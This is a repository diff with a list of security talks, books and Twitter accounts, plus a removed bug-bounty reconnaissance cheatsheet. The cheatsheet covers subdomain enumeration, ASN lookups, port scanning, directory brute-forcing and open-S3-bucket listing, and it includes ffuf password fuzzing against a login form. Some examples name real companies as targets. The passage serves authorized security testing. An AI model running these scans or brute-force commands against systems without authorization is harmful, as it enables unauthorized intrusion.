267	+	* A New Era Of SSRF: Exploiting Url Parsrs - Orange Tsai [https://www.youtube.com/watch?v=D1S-G8rJrEk](https://www.youtube.com/watch?v=D1S-G8rJrEk)
268	+	* HTTP Desync Attacks: Smashing into the Cell Next Door - albinowax [https://www.youtube.com/watch?v=w-eJM2Pc0KI\&t=1622s](https://www.youtube.com/watch?v=w-eJM2Pc0KI\&t=1622s)
269	+	* A $7.500 BUG BOUNTY Bug Explained, step by step. (Blind XXE OOB over DNS) - STOK [https://www.youtube.com/watch?v=aSiIHKeN3ys\&t=26s\&pbjreload=101](https://www.youtube.com/watch?v=aSiIHKeN3ys\&t=26s\&pbjreload=101)
270	+	* GitHub Recon and Sensitive Data Exposure [https://youtu.be/l0YsEk\_59fQ](https://youtu.be/l0YsEk\_59fQ)
271	+	* Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface [https://www.youtube.com/watch?v=zP4b3pw94s0](https://www.youtube.com/watch?v=zP4b3pw94s0)
272	+	* How to Crush Bug Bounties in the first 12 Months [https://www.youtube.com/watch?v=AbebbJ3cRLI](https://www.youtube.com/watch?v=AbebbJ3cRLI)
273	+	* The Bug Hunter’s Methodology v4.0 - Recon Edition by @jhaddix at #NahamCon2020 [https://youtu.be/p4JgIu1mceI](https://youtu.be/p4JgIu1mceI)
274	+	* How i became a HackerOne MVH without writing a single line of python (Motivational talk) by STOK [https://youtu.be/4YjCta2fcbw](https://youtu.be/4YjCta2fcbw)
275	+	* My Journey to Cybersecurity CIA Keynote - Heath Adams (aka The Cyber Mentor) [https://www.youtube.com/watch?v=q4h8A5dQsZw](https://www.youtube.com/watch?v=q4h8A5dQsZw)
276	+	* Defeating EDR’s using D/Invoke - Jean-François Maes - [https://youtu.be/d\_Z\_WV9fp9Q](https://youtu.be/d\_Z\_WV9fp9Q)
277	+
278	+	Cool Books
279	+
280	+	* [https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470](https://www.amazon.com/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470)
281	+	* [https://www.amazon.com/Real-World-Bug-Hunting-Field-Hacking/dp/1593278616/](https://www.amazon.com/Real-World-Bug-Hunting-Field-Hacking/dp/1593278616/)
282	+	* [https://www.amazon.com/How-Linux-Works-2nd-Superuser/dp/1593275676/](https://www.amazon.com/How-Linux-Works-2nd-Superuser/dp/1593275676/)
283	+
284	+	Infosec twitter accounts to follow (it’s a really awesome way to learn as well!. Will keep adding them)
285	+
286	+	* securibee: [https://twitter.com/securibee](https://twitter.com/securibee)
287	+	* codingo\_: [https://twitter.com/codingo](https://twitter.com/codingo)\_
288	+	* hakluke: [https://twitter.com/hakluke](https://twitter.com/hakluke)
289	+	* JackRhysider: [https://twitter.com/JackRhysider](https://twitter.com/JackRhysider)
290	+	* Orange Tsai: [https://twitter.com/orange\_8361](https://twitter.com/orange\_8361)
291	+	* MalwareTech: [https://twitter.com/MalwareTechBlog](https://twitter.com/MalwareTechBlog)
292	+	* TomTomNom: [https://twitter.com/TomNomNom](https://twitter.com/TomNomNom)
293	+	* Jason Haddix: [https://twitter.com/Jhaddix](https://twitter.com/Jhaddix)
294	+	* NahamSec: [https://twitter.com/NahamSec](https://twitter.com/NahamSec)
295	+	* STOK: [https://twitter.com/stokfredrik](https://twitter.com/stokfredrik)
296	+	* John Hammond: [https://twitter.com/\_johnhammond](https://twitter.com/\_johnhammond)
297	+	* Jake Williams: [https://twitter.com/MalwareJake](https://twitter.com/MalwareJake)
298	+	* Deviant Ollman: [https://twitter.com/deviantollam](https://twitter.com/deviantollam)
299	+	* J3rryBl4nks: [https://twitter.com/JBl4nks](https://twitter.com/JBl4nks)
300	+	* Tib3rius: [https://twitter.com/0xTib3rius](https://twitter.com/0xTib3rius)
301	+	* TheColonial: [https://twitter.com/TheColonial](https://twitter.com/TheColonial)
302	+	* Rob Fuller: [https://twitter.com/mubix](https://twitter.com/mubix)
303	+	* g0tmi1k: [https://twitter.com/g0tmi1k](https://twitter.com/g0tmi1k)
304	+	* TJ\_Null: [https://twitter.com/TJ\_Null](https://twitter.com/TJ\_Null)
305	+	* Rasta Mouse: [https://twitter.com/\_RastaMouse](https://twitter.com/\_RastaMouse)
306	+	* ippsec: [https://twitter.com/ippsec](https://twitter.com/ippsec)
307	+	* Chema Alonso: [https://twitter.com/chemaalonso](https://twitter.com/chemaalonso)
308	+	* FalconSpy: [https://twitter.com/0xFalconSpy](https://twitter.com/0xFalconSpy)
309	+	* Minh: [https://twitter.com/WhiteHoodHacker](https://twitter.com/WhiteHoodHacker)
310	+	* 0verfl0w: [https://twitter.com/0verfl0w](https://twitter.com/0verfl0w)\_
311	+	* Markus Höfer: [https://twitter.com/HashtagMarkus](https://twitter.com/HashtagMarkus)
312	+	* Jonas L: [https://twitter.com/jonasLyk](https://twitter.com/jonasLyk)
313	+	* Will Dormann: [https://twitter.com/wdormann](https://twitter.com/wdormann)
314	+	* Scott Piper: [https://twitter.com/0xdabbad00](https://twitter.com/0xdabbad00)
315	+

■ ■ ■ ■ ■ ■

page-1/README.md

1 - # Page 1
2 -
3 -

All occurrences

■ ■ ■ ■ ■ ■

page-1/bug-bounty-cheatsheet.md

1	-	# Bug Bounty Cheatsheet
2	-
3	-	#### <a href="#random-dns-pic" id="random-dns-pic"></a>
4	-
5	-	#### Burp Regex for Scope Control
6	-
7	-	```regex
8	-	.*\.domain\.com$
9	-	```
10	-
11	-	Explanation: This regular expression is used in Burp Suite to control the scope of the target by matching subdomains of the `domain.com` domain. It is commonly used to ensure that only specific subdomains are included in the testing scope.
12	-
13	-	Title: Pull Root Subdomains from Final.txt
14	-
15	-	```bash
16	-	cat final \| rev \| cut -d . -f 1-3 \| rev \| sort -u \| tee root.subdomains
17	-	```
18	-
19	-	Explanation: This command is used to extract the root subdomains from a file called `final.txt`. It performs several operations using common command-line tools (`cat`, `rev`, `cut`, `sort`) to manipulate the subdomains and then stores the unique root subdomains in a file called `root.subdomains`.
20	-
21	-	Title: Port Scanning IP Ranges
22	-
23	-	Explanation: This section provides tips for conducting port scanning on IP ranges. It suggests using tools like Basic Shodan, Google Dorks, and ASN lookups to find target CIDR ranges. It also recommends importing the scan results into a tool called IVRE for a comprehensive overview of the scanned IP addresses.
24	-
25	-	Small Tips:
26	-
27	-	1. It is recommended to run the port scanning on a virtual private server (VPS) like Linode.com.
28	-	2. Running the scan inside a screen session (`screen -SmL`) allows it to continue running even after disconnecting from the server.
29	-	3. Piping the output using `tee` allows saving the results to a file while still displaying them on the terminal.
30	-
31	-	Note: While some people suggest using masscan for faster scanning, the author finds that using a VPS along with nMap and Screen provides more reliable results, even though it may be slower.
32	-
33	-	Sn1per
34	-
35	-	Sn1per is an automated reconnaissance scanner designed for penetration testing and bug bounty hunting. It combines various tools and techniques to gather information and identify potential vulnerabilities in target systems.
36	-
37	-	How to use Sn1per:
38	-
39	-	1. Clone the Sn1per repository from GitHub:
40	-
41	-	```shell
42	-	git clone https://github.com/1N3/Sn1per.git
43	-	```
44	-
45	-	2. Navigate to the Sn1per directory:
46	-
47	-	```shell
48	-	cd Sn1per
49	-	```
50	-
51	-	3. Run the installation script to set up the required dependencies:
52	-
53	-	```shell
54	-	./install.sh
55	-	```
56	-
57	-	4. Once the installation is complete, you can start using Sn1per by running the following command:
58	-
59	-	```shell
60	-	./sn1per
61	-	```
62	-
63	-	By default, Sn1per runs in a wizard mode that guides you through the scanning process. It prompts you to enter the target URL or IP address, selects the scanning modules, and provides options for customization.
64	-
65	-	You can also use command-line arguments to specify the target and customize the scanning process. For example:
66	-
67	-	```shell
68	-	./sn1per -t example.com -m all -o output.txt
69	-	```
70	-
71	-	This command scans the target domain "example.com" using all available modules and saves the output to "output.txt".
72	-
73	-	Sn1per provides a wide range of scanning modules, including port scanning, subdomain enumeration, vulnerability scanning, and more. You can explore the documentation and usage guide in the Sn1per repository to learn about all the available options and advanced features.
74	-
75	-	Remember to use Sn1per responsibly and ethically, respecting the rules and guidelines of your engagements or bug bounty programs.
76	-
77	-	Subdomain Enumeration Techniques
78	-
79	-	Example:
80	-
81	-	Subdomain enumeration is an essential phase in reconnaissance for bug bounty hunting and penetration testing. It helps identify subdomains associated with a target domain, which can often reveal potential attack vectors or misconfigurations. Here are a few techniques and tools commonly used for subdomain enumeration:
82	-
83	-	1. Basic Enumeration with Subfinder: Subfinder is a versatile subdomain enumeration tool. It leverages various sources to discover subdomains associated with a target domain. Make sure to populate all API keys for optimal results, including a Shodan Pro account if available. To use Subfinder, execute the following command:
84	-
85	-	```
86	-	subfinder -d domain.com -o outfile.txt
87	-	```
88	-
89	-	`Rapid7 FDNS`: Rapid7 provides a comprehensive dataset called Sonar FDNS, which contains DNS-related information. This dataset can be used for subdomain enumeration. To utilize it, follow these steps:
90	-
91	-	* Install the necessary dependencies by running:
92	-
93	-	```
94	-	aptitude install jq pigz
95	-	```
96	-	* Download the Sonar FDNS dataset in JSON format:
97	-
98	-	```
99	-	wget https://opendata.rapid7.com/sonar.fdns_v2/2019-11-29-1574985929-fdns_a.json.gz
100	-	```
101	-	* Extract the data and filter subdomains of interest. For example:
102	-
103	-	```
104	-	cat 20170417-fdns.json.gz \| pigz -dc \| grep ".target.org" \| jq
105	-	```
106	-
107	-	`Rapid7 FDNS` (Part 2): Similar to the previous technique, you can download and process the Rapid7 FDNS dataset for subdomain enumeration. Here are the steps:
108	-
109	-	* Download the desired FDNS dataset:
110	-
111	-	```
112	-	wget https://opendata.rapid7.com/sonar.fdns_v2/2019-11-29-1574985929-fdns_a.json.gz
113	-	```
114	-	* Extract the data and filter subdomains based on your criteria. For example:
115	-
116	-	```
117	-	2019-11-29-1574985929-fdns_a.json.gz \| pigz -dc \| grep ".target.org" \| jq
118	-	```
119	-
120	-	`Rapid7 FDNS` (Part 3 with DNSGrep): The DNSGrep tool, based on Rapid7 Sonar DNS data, can help in subdomain enumeration. Please refer to the GitHub repository for more details and usage instructions: https://github.com/erbbysam/dnsgrep
121	-
122	-	`Assetfinder` by Tomnomnom: Assetfinder, developed by Tomnomnom, is a powerful tool for subdomain enumeration. It utilizes various sources to discover subdomains associated with the target domain. To use Assetfinder, execute the following command:
123	-
124	-	```
125	-	go get -u github.com/tomnomnom/assetfinder
126	-	assetfinder domain.com
127	-	```
128	-
129	-	Remember to respect the terms of service and usage policies of the respective tools and data sources. Subdomain enumeration should always be performed within the scope of authorized engagements or bug bounty programs.
130	-
131	-
132	-
133	-	Chaos - Project Discovery
134	-
135	-	```
136	-	- Requires a BETA Tester Key to function
137	-
138	-	chaos -d domain.com
139	-	```
140	-
141	-	Findomain
142	-
143	-	```
144	-	#https://github.com/Edu4rdSHL/findomain
145	-
146	-	Awesome little tool that can sometimes find domains amass cant - Also very quick as its built with rust :)
147	-
148	-	** Marked below require API Keys to work
149	-
150	-	Certspotter
151	-	Crt.sh
152	-	Virustotal
153	-	Sublist3r
154	-	Facebook **
155	-	Spyse (CertDB) *
156	-	Bufferover
157	-	Threadcrow
158	-	Virustotal with apikey **
159	-
160	-	findomain -t moj.io
161	-
162	-	```
163	-
164	-	Reverse WHOIS Search
165	-
166	-	```
167	-	#https://tools.whoisxmlapi.com/reverse-whois-search
168	-
169	-	Search Org name above to find all WHOIS Records with this Organisation listed.
170	-
171	-	For Ex. Oath Inc returns 10k subdomains
172	-
173	-	Take subdomains pipe them through assetfinder or amass again / crtsh.py
174	-
175	-	```
176	-
177	-	WaybackURLs - Fetch all URL’s that WayBackMachine Knows About a Domain
178	-
179	-	```
180	-	#https://github.com/tomnomnom/waybackurls
181	-
182	-
183	-	cat subdomains \| waybackurls > urls
184	-	```
185	-
186	-	Scan.io
187	-
188	-	```
189	-	Numerous repos & large dumps from various sources of Scans.
190	-
191	-	https://scans.io/
192	-	```
193	-
194	-	Assets-From-SPF / Pull Domains from SPF Records
195	-
196	-	```
197	-	https://github.com/yamakira/assets-from-spf
198	-
199	-	$ python assets_from_spf.py --help
200	-	Usage: assets_from_spf.py [OPTIONS] DOMAIN
201	-
202	-	Options:
203	-	--asn / --no-asn Enable/Disable ASN enumeration
204	-	--help Show this message and exit.
205	-	```
206	-
207	-	GitHub SubDomain Scrap
208	-
209	-	```
210	-	https://github.com/gwen001/github-search/blob/master/github-subdomains.py
211	-
212	-	As we have saw from various bug reports in the past, sometimes developers will leave API keys and SSH keys etc in public repos however the same principle applies for developers hard coding hidden endpoints or domains in the source code.
213	-
214	-	We can use github-subdomains.py to scrape for domains from public repos with the below syntax :)
215	-
216	-
217	-	python3 $Tools/github-subdomains.py -d paypal.com -t
218	-	```
219	-
220	-	Generate Basic Permutations
221	-
222	-	```
223	-	I have a small bash loop to handle this
224	-
225	-	#!/bin/bash
226	-	for i in $(cat /home/aidan/Tools/alterations.txt); do echo $i.$1;
227	-	done;
228	-	```
229	-
230	-	Reverse DNS Lookups on List of IP’s
231	-
232	-	```
233	-	#https://github.com/hakluke/hakrevdns
234	-
235	-	Sometimes you may have a IP list of targets instead of domains, perhaps from ASN lookup. Here we can use a quick little tool called hakrevdns to carry out numerous reverse DNS lookups.
236	-
237	-	hakluke~$ prips 173.0.84.0/24 \| hakrevdns
238	-	173.0.84.110 he.paypal.com.
239	-	173.0.84.109 twofasapi.paypal.com.
240	-	173.0.84.114 www-carrier.paypal.com.
241	-	173.0.84.77 twofasapi.paypal.com.
242	-	173.0.84.102 pointofsale.paypal.com.
243	-	173.0.84.104 slc-a-origin-pointofsale.paypal.com.
244	-	173.0.84.111 smsapi.paypal.com.
245	-	173.0.84.203 m.paypal.com.
246	-	173.0.84.105 prm.paypal.com.
247	-	173.0.84.113 mpltapi.paypal.com.
248	-	173.0.84.8 ipnpb.paypal.com.
249	-	173.0.84.2 active-www.paypal.com.
250	-	173.0.84.4 securepayments.paypal.com.
251	-	```
252	-
253	-	AMass Basic Active Scan
254	-
255	-	```
256	-	You could do with a amass passive scan and not resolve domains with MassDNS later but I usually just go with active :)
257	-
258	-	amass enum -d paypal.com,paypal.co.uk
259	-	```
260	-
261	-	Certificate Transparency Logs
262	-
263	-	```
264	-	python3 $BugBounty crt.sh domain.com
265	-
266	-	This script be found in my GitHub repo, it just takes a domain and passes it to crt.sh and aggerates the output.
267	-	```
268	-
269	-	Subdomain Brute Force (Subbrute & MassDNS)
270	-
271	-	```
272	-	$Tools/subbrute.py $Tools/massdns/lists/names.txt domain.com \| massdns -r $Tools/massdns/lists/resolvers.txt -t A -a -o -w massdns_output.txt -
273	-	```
274	-
275	-	Generate Permutations with AltDNS
276	-
277	-	```
278	-	altdns -i input_domains.txt -o permutationoutput.txt -w $Tools/altdns/words.txt -r -s resolved_output.txt
279	-
280	-	This may take a while to run but should always be part of your recon process no matter how little results it yields.
281	-	```
282	-
283	-	Generate Permutations with dnsGen (Overall Best Way)
284	-
285	-	```
286	-	#https://github.com/ProjectAnte/dnsgen
287	-
288	-	git clone https://github.com/ProjectAnte/dnsgen
289	-	cd dnsgen
290	-	pip3 install -r requirements.txt
291	-	python3 setup.py install
292	-
293	-	cat domains.txt \| dnsgen - \| massdns -r /path/to/resolvers.txt -t A -o J --flush 2>/dev/null
294	-	```
295	-
296	-	Find Resolvable Domains with MassDNS
297	-
298	-	```
299	-	massdns -r $Tools/massdns/lists/resolvers.txt -t A -o S allsubdomains.txt -w livesubdomains.messy
300	-
301	-	sed 's/A.//' livesubdomains.messy \| sed 's/CN.//' \| sed 's/\..$//' > domains.resolved
302	-	```
303	-
304	-	Find HTTP/HTTPS Servers with HTTProbe
305	-
306	-	```
307	-	cat domains.resolved \| httprobe -c 50 -p 8080,8081,8089 \| tee http.servers
308	-
309	-
310	-	the -p flag adds these ports to the scan, will increase time but good for finding secondary http services on non standard ports (80,443)
311	-	```
312	-
313	-	Find HTTP/HTTPS Servers with nMap and Filtering
314	-
315	-	```
316	-
317	-	sudo nmap -sS -p 80,443 -iL List.txt -oA m0chan.xml
318	-
319	-	import xmltree
320	-	def removeHostname():
321	-	for host in root.iter('host'):
322	-	for elem in host.iter():
323	-	if 'name' in elem.attrib and elem.attrib['name'] == 'ISP_redir_site':
324	-	root.remove(host)
325	-	tree.write('output.xml')
326	-	```
327	-
328	-	Pass HTTProbe Results to EyeWitness
329	-
330	-	```
331	-	cp http.servers $Tools
332	-	$Tools/EyeWitness/eyewitness.py --web -f http.servers
333	-	```
334	-
335	-	Pass All Subdomains too S3 Scanner
336	-
337	-	```
338	-	Even if a subdomain does not follow normal bucket naming conventtion it may be resolving to an unsecured one.
339	-
340	-	Therefore run the following
341	-
342	-	python $Tools/S3Scanner/s3scanner.py -l domains.resolved -o buckets.txt
343	-
344	-	-d flag will dump all open buckets locally
345	-
346	-	If you find open buckets you can run the useful bash look to enumerate content
347	-
348	-	for i in $(cat buckets.txt); do aws s3 ls s3://$i; done;
349	-
350	-	This will require basic auth key/secret which you can get for free from AWS
351	-	```
352	-
353	-	Finding CNames for all Domains
354	-
355	-	```
356	-	massdns -r massdns/lists/resolvers.txt -t CNAME -o S -w paypal.massdns.cnames paypal.subdomains
357	-
358	-	cat paypal.subdomains \| grep trafficmanager
359	-	cat paypal.subdomains \| grep azure
360	-	```
361	-
362	-	Subdomain Bruteforcing with all.txt
363	-
364	-	```
365	-	#https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056
366	-
367	-	todo - As there is a few methods to talk about here but the best wordlists is Jason Haddix's all.txt
368	-
369	-	dnsrecon -d paypal.com -D all.txt -t brt
370	-
371	-	#Fastest is Probably SubBrute.py
372	-	python $Tools/subbrute/subbrute.py paypal.com paypal.co.uk -t all.txt
373	-
374	-
375	-	#Final method is using GoBuster which is also v fast
376	-	gobuster dns -d paypal.com -w all.txt
377	-	```
378	-
379	-	Subdomain Bruteforcing with Commonspeak Wordlists
380	-
381	-	```
382	-	#https://github.com/assetnote/commonspeak2
383	-	#https://github.com/assetnote/commonspeak2-wordlists
384	-
385	-	Common speak from Assetnote has a unique way of generating wordlists and
386	-	one of my favorite wordlists to use for subdomain brute forcing. There are
387	-	numerous datasets on Google Big query that are constantly being updated with
388	-	new information. These datasets are used by common speak to create a wordlist
389	-	that contain current technologies and terminology.
390	-
391	-	dnsrecon -d paypal.com -D commonspeak.txt -t brt
392	-
393	-
394	-	#Fastest is Probably SubBrute.py
395	-	python $Tools/subbrute/subbrute.py paypal.com paypal.co.uk -t commonspeak.txt
396	-
397	-	#Final method is using GoBuster which is also v fast
398	-	gobuster dns -d paypal.com -w commonspeak.txt
399	-	```
400	-
401	-	Fuzzing Subdomains with WFuzz
402	-
403	-	```
404	-	wfuzz -c -f re -w /SecLists/Discovery/DNS/subdomains-top1mil-5000.txt -u "http://domain.htb" -H "Host: FUZZ.domain.htb" --hh 311\
405	-	```
406	-
407	-	#### ASN Enumeration
408	-
409	-	I wasn’t sure if I should add this under Subdomain Enumeration but doesn’t really matter. Here are a few techniques to discover subdomains and ports via companies publicly available ASN numbers.
410	-
411	-	Reverse WHOIS on Company Name with Whoxy
412	-
413	-	```
414	-	#Requires a paid API key, but well worth the money :)
415	-
416	-	curl "http://api.whoxy.com/?key=xxxxx&reverse=whois&mode=micro&company=Uber+Technologies,+Inc." \| jq -r '.search_result[].domain_name'
417	-
418	-	```
419	-
420	-	ASNLookup
421	-
422	-	```
423	-	#https://github.com/yassineaboukir/Asnlookup
424	-
425	-	python asnlookup.py -o <Organization>`
426	-	```
427	-
428	-	Find Organistations ASN’s
429	-
430	-	```
431	-	amass intel -org paypal
432	-	1449, PAYPAL-CORP - PayPal
433	-	17012, PAYPAL - PayPal
434	-	26444, PAYDIANT - PayPal
435	-	59065, PAYPALCN PayPal Network Information Services (Shanghai) Co.
436	-	206753, PAYPAL-
437	-	```
438	-
439	-	Find IPv4 Address Space from ASN
440	-
441	-	```
442	-	I have yet to find a good tool to do this so I will be writing something in Go very shortly, but in the meantime you can simple visit
443	-
444	-	https://bgp.he.net/ASNNumberHere#_prefixes
445	-
446	-	https://bgp.he.net/AS17012#_prefixes
447	-	```
448	-
449	-	![](http://i.imgur.com/ydjR8W9.png)\</img>
450	-
451	-	Parse CIDR from ASN Lookup too AMass Enum
452	-
453	-	```
454	-	amass enum -d paypal.com -cidr 64.4.240.0/21
455	-
456	-	I have found to have really good results using `amass enum` here + large CIDR range however sometimes these can be false positives/dead hosts so remember to verifiy with MassDNS if they are live.
457	-	```
458	-
459	-	#### Content Discovery
460	-
461	-	Here I will discuss some basic tactics once you have a nice list of live subdomains
462	-
463	-	Basic Crawling
464	-
465	-	```
466	-	Crawling a website is typically one of the first places to start once you have discovered the live endpoints. It basically involves recursively visiting and saving each link on a website
467	-
468	-	The author of Bug Bounty Playbook created a tool to help with this
469	-
470	-	#https://github.com/ghostlulzhacks/crawler/tree/master
471	-
472	-	python3 $Tools/crawler/crawler.py -d https://paypal.com -l 2
473	-
474	-
475	-	These crawling results can also be combined with the JSearch techniques listed below
476	-	```
477	-
478	-	Commoncrawl One Liner
479	-
480	-	```
481	-	curl -sL http://index.commoncrawl.org \| grep 'href="/CC' \| awk -F'"' '{print $2}' \| xargs -n1 -I{} curl -sL http://index.commoncrawl.org{}-index?url=http://yahoo.com* \| awk -F'"url":\ "' '{print $2}' \| cut -d'"' -f1 \| sort -u \| tee domain.txt
482	-	```
483	-
484	-	Wayback Machine Crawling
485	-
486	-	```
487	-	#https://github.com/ghostlulzhacks/waybackMachine
488	-
489	-	Sometimes visiting wayback machine and looking up a domain will yield us some awesome results which we can filter for things like .zip, .config and find old endpoints that are technically still live. s
490	-
491	-	We can then use this data to find vulns,
492	-
493	-	Quote from Bug Bounty Playbook
494	-
495	-	"For instance, if you see the path “example.com/?redirect=something.com” you can test for open redirects and SSRF vulnerabilities. If you see the GET parameter “msg=” you can test for XSS. The list can go on for days."
496	-
497	-	You can do this manually on the site or using the script linked above
498	-
499	-	python3 $Tools/waybackMachine/waybackmachine.py paypal.com
500	-	```
501	-
502	-	Common Crawl Data
503	-
504	-	```
505	-	#https://github.com/ghostlulzhacks/commoncrawl
506	-
507	-	Just like The Wayback Machine Common Crawl also regularly crawls the internet for endpoints. Also, like the Wayback Machine this data is publicly available and we can use it to get a list of endpoints on a site passively.
508	-
509	-	python3 $Tools/commoncrawl/cc.py -d paypal.com
510	-	```
511	-
512	-	Find Easy Wins with DirSearch
513	-
514	-	```
515	-	Of course if we have a large amount ot subs we can't just send over directory-list-2.3medium so I typically use this small list against all the subdomains and (or) ip ranges from ASN lookups.
516	-
517	-	/phpinfo.php
518	-	/info.php
519	-	/admin.php
520	-	/api/apidocs
521	-	/apidocs
522	-	/api
523	-	/api/v2
524	-	/api/v1
525	-	/v2
526	-	/package.json
527	-	/security.txt
528	-	/application.wadl
529	-	/api/apidocs
530	-	/swagger
531	-	/swagger-ui
532	-	/swagger-ui.html
533	-	/swagger/swagger-ui.html
534	-	/api/swagger-ui.html
535	-	/v1.x/swagger-ui.html
536	-	/swagger/index.html
537	-	/graphql
538	-	/graphiql
539	-
540	-	python3 dirsearch.py -L http.servers -e .* -w paths --simple-report=dirsearch.paypal -t 50
541	-
542	-	Be careful with the -t flag, I am using a pretty beefy VPS for this stage :)
543	-	```
544	-
545	-	dirSearching with RobotsDisallowed1000.txt
546	-
547	-	```
548	-	This is similar to the previous method but we are using a Wordlist supplied with SecLists that details the top 1000 entries inside Robots.txt
549	-
550	-	https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/RobotsDisallowed-Top1000.txt
551	-
552	-	This usually dosent take too long but can be depending on the scope.
553	-
554	-	Tip: Run this on a VPS
555	-
556	-	I have had some nice success with raft-large-files.php
557	-
558	-	python3 dirsearch.py -L http.servers -e .* -w RobotsDisallowed-Top1000.txt --simple-report=dirsearch.paypal -t 50
559	-
560	-	Be careful with the -t flag, I am using a pretty beefy VPS for this stage :)
561	-	```
562	-
563	-	Excessive DirSearching with RAFT
564	-
565	-	```
566	-	This may take a very long time to run and timeout depending on your scope but these lists are the goto when it comes to dirbusting
567	-
568	-	Tip: Run this on a VPS
569	-
570	-	https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/raft-large-directories.txt
571	-
572	-	https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/raft-large-files.txt
573	-
574	-	I have had some nice success with raft-large-files.php
575	-
576	-	python3 dirsearch.py -L http.servers -e .* -w wordlist --simple-report=dirsearch.paypal -t 50
577	-
578	-	Be careful with the -t flag, I am using a pretty beefy VPS for this stage :)
579	-	```
580	-
581	-	Meg - Find Many Paths for Hosts (Similar to DirSearch)
582	-
583	-	```
584	-	#https://github.com/tomnomnom/meg
585	-
586	-	meg --verbose paths http.servers
587	-
588	-	This will create a /out folder with results from each web server (use this after httprobe) - Then we can simply start grepping for juicy stuff
589	-
590	-	grep -r api
591	-	grep -r phpinfo
592	-
593	-	Use this wordlist
594	-
595	-	https://gist.github.com/tomnomnom/57af04c3422aac8c6f04451a4c1daa51
596	-
597	-	etc etc
598	-	```
599	-
600	-	DirSearching with FFUF (New Method)
601	-
602	-	```
603	-	#https://github.com/ffuf/ffuf
604	-
605	-	Written in Go so very fast
606	-
607	-	Directory Fuzzing
608	-
609	-	ffuf -c -w /path/to/wordlist -u http://yahoo.com/FUZZ
610	-
611	-	GET Parameter Fuzzing
612	-
613	-	ffuf -w /path/to/paramnames.txt -u https://target/script.php?FUZZ=test_value -fs 4242
614	-
615	-	POST Data Fuzzing
616	-
617	-	ffuf -w /path/to/postdata.txt -X POST -d "username=admin\&password=FUZZ" -u https://target/login.php -fc 401
618	-
619	-	```
620	-
621	-	DirSearching with FFUF Loop (September 2020)
622	-
623	-	```
624	-	ffufhttpservices(){
625	-	for i in $(cat newsubs.httprobe); do ffuf -u $i/FUZZ -w /root/Wordlists/NewWordlist.txt \
626	-	-H "User-Agent: Mozilla/5.0 Windows NT 10.0 Win64 AppleWebKit/537.36 Chrome/69.0.3497.100" -H "X-Forwarded-For: 127.0.0.1" \
627	-	-c -fs 0 -t 30 -mc 200 -recursion ; done \| tee xxxxx;
628	-	cat xxxxx \| egrep -v "Method\|Header\|Follow\|Calib\|Timeout\|Thread\|Matc\|Filt\|v1\|_\|^$" \| tee ffuf.results; rm xxxxx;
629	-
630	-	#Need to add a check if http/https both exist to only run https mayb?
631	-	}
632	-	```
633	-
634	-	EyeWitness - Source View
635	-
636	-	```
637	-	Recently while working on big programs I have had some success with grepping the EyeWitness source for sensitive files for example
638	-
639	-	VPS:> cd EyeWitness
640	-	VPS:> grep -r Tomcat
641	-	VPS:> grep -r IIS6.0
642	-
643	-
644	-	etc etc
645	-
646	-	When EyeWitness runs it will save the source of the URLs it screenshots inside the working folder
647	-	```
648	-
649	-	WaybackURLs - Fetch all URL’s that WayBackMachine Knows About a Domain
650	-
651	-	```
652	-	#https://github.com/tomnomnom/waybackurls
653	-
654	-
655	-	cat subdomains \| waybackurls > urls
656	-	```
657	-
658	-	Archive.org Direct URL Access - Really Good
659	-
660	-	```
661	-	http://web.archive.org/cdx/search/cdx?url=.visma.com/&output=text&fl=original&collapse=urlkey
662	-	```
663	-
664	-	GetAllURL’s
665	-
666	-	```
667	-	Bash alias already created in profile on VPS - getallurls or getallurlsloop
668	-	```
669	-
670	-	GoSpider
671	-
672	-	```
673	-	#https://github.com/jaeles-project/gospider
674	-
675	-	- Run with single site
676	-
677	-	gospider -s "https://m0chan.co.uk" -c 10 -d 1
678	-
679	-	- Run with 20 sites & 10 bots each site
680	-
681	-	gospider -S sites.txt -o output -c 10 -d 1 -t 20
682	-
683	-
684	-	```
685	-
686	-	Tomnomnom’s Concurl
687	-
688	-	```
689	-	#https://github.com/tomnomnom/concurl
690	-
691	-
692	-	▶ cat urls.txt
693	-	https://example.com/path?one=1&two=2
694	-	https://example.com/pathtwo?two=2&one=1
695	-	https://example.net/a/path?two=2&one=1
696	-
697	-	▶ cat urls.txt \| concurl -c 3
698	-	out/example.com/6ad33f150c6a17b4d51bb3a5425036160e18643c https://example.com/path?one=1&two=2
699	-	out/example.net/33ce069e645b0cb190ef0205af9200ae53b57e53 https://example.net/a/path?two=2&one=1
700	-	out/example.com/5657622dd56a6c64da72459132d576a8f89576e2 https://example.com/pathtwo?two=2&one=1
701	-
702	-	▶ head -n 7 out/example.net/33ce069e645b0cb190ef0205af9200ae53b57e53
703	-	cmd: curl --silent https://example.net/a/path?two=2&one=1
704	-
705	-
706	-
707	-	Concurrent HTTP Requests because Go is fast as f
708	-	```
709	-
710	-	Get All Subdomain HTTP Headers & Responses
711	-
712	-	```
713	-	#Reference: https://medium.com/bugbountywriteup/fasten-your-recon-process-using-shell-scripting-359800905d2a
714	-
715	-	Cool little bash loop to handle this, we will loop through all the found http/https servers from httprobe and grab the headers and responses.
716	-
717	-	Great way to find legacy web servers or quickly check the reponses to find easy wins.
718	-
719	-	Stored as GetAllHeadersandResponses.sh in my repo :)
720	-
721	-	Todo: I will rewrite this to support Tomnomnoms concurl to carry out concurrent http requests when I have time :)
722	-
723	-
724	-	#!/bin/bash
725	-	mkdir headers
726	-	mkdir responsebody
727	-	CURRENT_PATH=$(pwd)
728	-	for x in $(cat $1)
729	-	do
730	-	NAME=$(echo $x \| awk -F/ '{print $3}')
731	-	curl -X GET -H "X-Forwarded-For: evil.com" $x -I > "$CURRENT_PATH/headers/$NAME"
732	-	curl -s -X GET -H "X-Forwarded-For: evil.com" -L $x > "$CURRENT_PATH/responsebody/$NAME"
733	-	done
734	-
735	-
736	-	In the next step I will show how we can use the collected data to grab all Javascript files from the endpoints :) There is also another way with JSearch which I will show further down.
737	-	```
738	-
739	-	Collecting JavaScript Files
740	-
741	-	```
742	-	#Reference: https://medium.com/bugbountywriteup/fasten-your-recon-process-using-shell-scripting-359800905d2a
743	-
744	-	This script will crawl all the responses from the previous script and store all javascripts files inside domain.com/scripts
745	-
